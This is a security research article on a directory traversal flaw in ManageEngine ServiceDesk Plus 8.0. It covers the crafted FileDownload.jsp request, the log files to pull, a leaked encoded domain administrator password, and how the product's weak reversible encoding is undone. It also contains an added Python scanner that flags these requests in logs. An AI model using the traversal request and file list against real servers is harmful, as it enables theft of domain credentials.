Research on ManageEngine ServiceDesk encryption and decryption


Author: robot # sec-lab.org & bhst.org

[0x00] Overview
ManageEngine is mainly used in IT operations and maintenance (O&M) management solutions. It contains many subsystems that cover various IT management needs and is often used for IT O&M management in large enterprises; it has many deployments abroad and is sold through agents in China. This article studies the encryption and decryption methods of one of its subsystems, ServiceDesk.
The environment in this article is based on ManageEngine ServiceDesk 8.0.0. This version has a directory traversal download vulnerability. The product is developed in Java and is highly cross-platform, so this article mainly analyzes the security exploitation ideas on Windows. The core is to study the background encryption and decryption methods.
Because I am a beginner in Java, I hope readers will point out anything wrong in the analysis. I also declare that this article is only for research purposes and must not be used illegally. Otherwise, the consequences will be borne by me.
[0x01] Vulnerability exploitation
This vulnerability exists in ManageEngine ServiceDesk Plus 8.0 and allows arbitrary file download. On Linux a lot of information can be obtained this way, which I will not cover here; on Windows there is much less to work with. The first idea for this vulnerability is to download the configuration files. However, after setting up a local environment, we find that the system's default configuration files give away little, because the user's configuration information is written into the database, and the MySQL or MSSQL database cannot be downloaded while it is running. Here are the sensitive files and directories worth viewing:
# User product registration information
C:\ManageEngine\ServiceDesk\logs\customerInfo.txt
# If the default PostgreSQL database is used
C:\ManageEngine\ServiceDesk\logs\InitPgsqllog.txt
# Service port and configuration information
C:\ManageEngine\ServiceDesk\logs\configport.txt
# The default server log is very important; in a domain environment it contains the password hash
C:\ManageEngine\ServiceDesk\server\default\log\serverout0.txt
# System startup log, including the system version and running environment, used to determine the database type
C:\ManageEngine\ServiceDesk\server\default\log\boot.log
The vulnerability exploitation request is as follows:
http://localhost:8080/workorder/FileDownload.jsp?module=agent&FILENAME=%20...\[FileToDownload]
Note that the separator in this path must be a backslash; otherwise, the system reports that the file does not exist.
On Windows the situation is frustrating: it is not obvious which files to download to obtain sensitive information. Finally, the domain password hash was found in the log file C:\ManageEngine\ServiceDesk\server\default\log\serverout0.txt, and its encryption and decryption method is analyzed below.
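An added example (not from the original post) of how a defender could flag the FileDownload.jsp traversal pattern described above in web-server access logs. The log lines are constructed, and the Common Log Format layout and the parameter names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jun/2013:00:19:39 +0800] "GET /workorder/FileDownload.jsp?module=agent&FILENAME=%20..\\..\\..\\logs\\serverout0.txt HTTP/1.1" 200 51234
10.0.0.5 - - [23/Jun/2013:00:19:40 +0800] "GET /workorder/FileDownload.jsp?module=agent&FILENAME=..%5c..%5cboot.log HTTP/1.1" 200 2048
10.0.0.7 - - [23/Jun/2013:00:20:01 +0800] "GET /workorder/FileDownload.jsp?module=agent&FILENAME=report.pdf HTTP/1.1" 200 7777
10.0.0.9 - - [23/Jun/2013:00:20:05 +0800] "GET /workorder/WorkOrder.do HTTP/1.1" 200 4096
"""

# Client IP, request method and request target of a Common Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')


def normalize(value: str) -> str:
    """Percent-decode twice (catches %255c double encoding) and fold
    backslashes to '/', since the page notes the backslash form is what the
    Windows deployment accepts."""
    decoded = unquote(unquote(value))
    return decoded.replace("\\", "/")


def is_traversal(filename: str) -> bool:
    """True if any path segment is '..' after normalization.  Segments are
    stripped so the leading %20 (space) used in the request still matches."""
    return any(seg.strip() == ".." for seg in normalize(filename).split("/"))


def scan_log(log_text: str) -> list:
    """Return (client_ip, normalized FILENAME) for each traversal attempt
    against /workorder/FileDownload.jsp."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/workorder/filedownload.jsp"):
            continue
        params = {k.upper(): v for k, v in
                  parse_qs(parts.query, keep_blank_values=True).items()}
        for name in params.get("FILENAME", []):
            if is_traversal(name):
                hits.append((m.group("ip"), normalize(name).strip()))
    return hits


if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```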
[0x02] Research on encryption and decryption
First, we find the following record in the serverout0.txt file:
[00:19:39:462]|[06-23-2013]|[com.adventnet.servicedesk.contract.internal.cleanActiveDirectory]|[INFO]|[18]|: DataObject of Domains: <WritableDataObject>
<Tables>
[DomainInfo, DomainLoginInfo, PasswordInfo, SDActiveDirectoryInfo] </Tables>
SelectQuery Object:
Select columnNames = [DomainInfo.DOMAINID, DomainInfo.COMMENTS, DomainInfo.DOMAINNAME, DomainInfo.DISCOVERYSTATUS, DomainInfo.ISPUBLIC, SDActiveDirectoryInfo.AD_ID, SDActiveDirectoryInfo.DOMAIN_ID, SDActiveDirectoryInfo.SERVER_NAME, DomainLoginInfo.DOMAINID, DomainLoginInfo.DOMAINLOGINNAME, DomainLoginInfo.PASSWORDID, PasswordInfo.PASSWORDID, PasswordInfo.DOMAINPASSWORD]
Criteria = (DomainInfo.domainid in ('20140901'))
Number of Objects = 0
Starting row = 1
Order by columnNames = []
Table List = [DomainInfo AS DomainInfo, SDActiveDirectoryInfo AS SDActiveDirectoryInfo, DomainLoginInfo AS DomainLoginInfo, PasswordInfo AS PasswordInfo]
Joins = Join:= DomainInfo AS DomainInfo left join SDActiveDirectoryInfo AS SDActiveDirectoryInfo ON DomainInfo.DOMAINID = SDActiveDirectoryInfo.DOMAIN_ID, Join:= DomainInfo AS DomainInfo left join DomainLoginInfo AS DomainLoginInfo ON DomainInfo.DOMAINID = DomainLoginInfo.DOMAINID, Join:= DomainLoginInfo AS DomainLoginInfo left join PasswordInfo AS PasswordInfo ON DomainLoginInfo.PASSWORDID = PasswordInfo.PASSWORDID
SetLock = false
<JoinsInDO>
Join:= DomainInfo AS DomainInfo left join SDActiveDirectoryInfo AS SDActiveDirectoryInfo ON DomainInfo.DOMAINID = SDActiveDirectoryInfo.DOMAIN_ID
Join:= DomainInfo AS DomainInfo left join DomainLoginInfo AS DomainLoginInfo ON DomainInfo.DOMAINID = DomainLoginInfo.DOMAINID
Join:= DomainLoginInfo AS DomainLoginInfo left join PasswordInfo AS PasswordInfo ON DomainLoginInfo.PASSWORDID = PasswordInfo.PASSWORDID
</JoinsInDO>
<Operations>
</Operations>
<Rows>
<DomainInfo DOMAINID="301" DOMAINNAME="ITTONGLUREN.COM" CANONICALNAME="null" DISCOVERYSTATUS="UNDISCOVERED" COMMENTS="" LASTDISCOVEREDTIME="null" ISPUBLIC="true"/>
<DomainLoginInfo DOMAINID="301" DOMAINLOGINNAME="administrator" PASSWORDID="1"/>
<PasswordInfo PASSWORDID="1" DOMAINPASSWORD="e8c94uB8969Ib9678Y1" ALGORITHM="null"/>
<SDActiveDirectoryInfo AD_ID="1" DOMAIN_ID="301" SERVER_NAME="adserver-01f2fe" USER_NAME="null" USER_PASSWORD="null"/>
</Rows>
</WritableDataObject>
Here we obtain a very important piece of information, DOMAINPASSWORD, so we must analyze how this 19-character password is encrypted and decrypted. I chose the Cavaj Java Decompiler for reverse analysis. Searching for the CleanActiveDirectory function named in the log leads to the AdventNetContractAuditService.sar package (figure 01):

Open the jar package with RAR and find the corresponding class file by searching its contents (figure 02):

Load CleanActiveDirectory.class into Cavaj and analyze its run function; this is where the password in the log is written. The code is as follows (figure 03):


Here we obtain the domain information struct DomainInfo and the encryption class Encoder. We also find that this record is read from the database. I set up a local PostgreSQL database, which we can query (figure 04):

This matches the log, so the next step is to analyze the Encoder class. A search shows that many jar packages contain this class; after repeated checking, the actual encryption and decryption implementation was confirmed to be in the adventnetservice1_common jar package, at the path \com\adventnet\servicedesk\security\encoder.class (figure 05):

In this class, we first analyze the encryption function convertToNewBase (figure 06):

The encryption process is very simple: it only performs a simple ASCII transformation. The decryption function is also provided for us, since CleanActiveDirectory.class directly calls convertFromBase for decoding, so decryption is just as simple. Here I write a Java file for decoding (figure 07):

Briefly, to compile Java: download and install the JDK from Sun's official site, set the environment variables and the classpath, then go to the project directory and run:
# Compile the Java file to generate the .class file (the file name is case sensitive, even on Windows)
javac encoder.java
# Run it as java + space + class name (the class name is case sensitive)
java encoder
After that, the encoding and decoding program can be run.
[0x03] Summary
Java is not as hard as you might think; it is quite quick to get started, especially for those with a C/C++ background. This article does not contain much analysis and focuses on the encryption and decryption module. Please contact us with any questions: http://www.sec-lab.org or www.bhst.org.